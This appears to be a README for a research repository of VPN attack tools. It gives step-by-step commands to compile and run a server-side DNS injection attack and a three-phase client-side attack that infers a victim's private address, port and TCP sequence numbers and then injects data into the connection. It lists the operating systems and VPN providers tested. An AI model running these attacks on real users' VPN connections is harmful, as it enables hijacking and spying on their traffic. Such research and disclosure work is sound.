155 lines
4.6 KiB
Markdown
155 lines
4.6 KiB
Markdown
# vpn-attacks
|
|
|
|
|
|
##### Attack Machine Environment
|
|
|
|
* C++
|
|
* libtins (http://libtins.github.io/download/)
|
|
|
|
|
|
## Server-side attack
|
|
|
|
|
|
#### Requirements
|
|
|
|
* VPN client connected to a VPN server
|
|
* Attack machine sitting somewhere in between VPN server and client forwarding all traffic between the two
|
|
|
|
***Note:*** Full virtual test environment setup for the server-side attack is detailed in the README within the `virt-lab` folder
|
|
|
|
|
|
#### Running the DNS Attack Script
|
|
|
|
1. Change to udp-dns attack folder - `cd server-side-attack/dns-sside/full_scan`
|
|
2. Compile attack script - `make`
|
|
3. Check to make sure vpn server has a conntrack entry for some vpn client's dns lookup (on vpn-server vm): `sudo conntrack -L | grep udp`
|
|
3. Try to inject from attack router - `sudo ./uud_send <dns_server_ip> <src_port (53)> <vpn_server_ip> <start_port> <end_port>`
|
|
|
|
|
|
|
|
## Client-side attack
|
|
|
|
|
|
#### Requirements
|
|
|
|
* VPN client connected to a VPN server
|
|
* Reverse path filtering disabled on the VPN client machine
|
|
* Attack machine acting as the local network gateway for the victim (VPN client) machine using hostapd, create_ap, or Ubuntu's built-in hotspot feature.
|
|
|
|
#### Running the Full Attack Script
|
|
|
|
* Rebuild all the attack scripts: `./rebuild_all.sh`
|
|
* `cd full_attack`
|
|
* Change `attack.sh` vars to appropriate values
|
|
* `sh attack.sh <remote_ip>`
|
|
|
|
***Note:*** `remote_ip` specifies the IP address of the HTTP site.
|
|
|
|
|
|
#### Testing Indivual attack phases
|
|
|
|
|
|
##### Phase 1 - Infer victim's private address
|
|
|
|
* `cd first_phase`
|
|
* `python3 send.py <victim_public_ip> <private_ip_range>`
|
|
|
|
***Note:*** `private_ip_range` specifies a `/24` network such as `10.7.7.0`.
|
|
|
|
|
|
##### Phase 2 - Infer the port being used to talk to some remote address
|
|
|
|
* `cd sec_phase`
|
|
* Edit `send.cpp` to use the correct MAC addresses
|
|
* `g++ send.cpp -o send -ltins`
|
|
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip>`
|
|
|
|
***Note:*** `<remote_ip>` is the address we wanna check if the client is connected to and the `<remote_port>` is almost always 80 or 443. The `<victim_wlan_ip>` is the public address of the victim and `<victim_priv_ip>` was found in phase 1. If the scripts not sniffing any challenge acks, then edit the `send.cpp` file to uncomment the `cout` line that prints out the remainder to check if the size of the encrypted packets has slightly changed on this system.
|
|
|
|
|
|
##### Phase 3 - Infer exact sequence number and in-window ack
|
|
|
|
* `cd third_phase`
|
|
* Edit `send.cpp` to use the correct MAC addresses
|
|
* `g++ send.cpp -o send -ltins`
|
|
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip> <victim_port>`
|
|
|
|
|
|
***Note:*** `<victim_port>` was found in phase 2. This script currently just injects a hardcoded string into the TCP connnection but could be easily modified.
|
|
|
|
## Tested operating systems, applications, and VPN providers
|
|
|
|
##### Operating systems
|
|
|
|
* iOS (up to v12.4.1)
|
|
* Android (up to v10)
|
|
* Ubuntu (v20.04)
|
|
* Fedora (v31)
|
|
* Debian (v10.2)
|
|
* Arch (v2019.05)
|
|
* Manjaro (v18.1.1)
|
|
* MX Linux (v19)
|
|
* Slackware (v14.2)
|
|
* Void Linux (rolling)
|
|
* Devuan (v2.1)
|
|
* Deepin (v15.11)
|
|
* FreeBSD (v12.1)
|
|
* OpenBSD (v6.6)
|
|
* macOS (Sierra, High Sierra, Mojave)
|
|
|
|
##### VPN Providers and applications
|
|
|
|
* Mullvad
|
|
* PIA
|
|
* ProtonVPN
|
|
* PureVPN
|
|
* FrootVPN
|
|
* VyperVPN
|
|
* ExpressVPN
|
|
* SlickVPN
|
|
* TunnelBear
|
|
* SoftEther
|
|
* Hotspot Shield
|
|
* Betternet
|
|
* SecurityKiss
|
|
* Spotflux
|
|
* CyberGhost
|
|
* Surfshark
|
|
* IPVanish
|
|
* TorGuard
|
|
* StrongVPN
|
|
* Wang VPN
|
|
* Pupa VPN
|
|
* Thunder VPN
|
|
* Galaxy VPN
|
|
* SecureVPN
|
|
* Panda VPN Pro
|
|
* NordVPN
|
|
* SuperVPN Free
|
|
* VPN Free
|
|
* Wuma VPN PRO
|
|
* Xiaoming VPN
|
|
* SurfVPN
|
|
* BlueWhale VPN
|
|
* Orbot
|
|
* Lantern
|
|
* Psiphon
|
|
|
|
#### Source Code License
|
|
|
|
Copyright (C) 2018-2021 Breakpointing Bad unless otherwise noted.
|
|
Where another license is included, please follow the licensing and
|
|
redistribution clauses of the author.
|
|
|
|
These program are free software: you can redistribute it and/or modify
|
|
it under the terms of the GNU General Public License as published by
|
|
the Free Software Foundation, either version 3 of the License, or
|
|
(at your option) any later version.
|
|
|
|
This program is distributed in the hope that it will be useful,
|
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
GNU General Public License for more details.
|
|
|
|
You should have received a copy of the GNU General Public License
|
|
along with this program. If not, see <http://www.gnu.org/licenses/>. |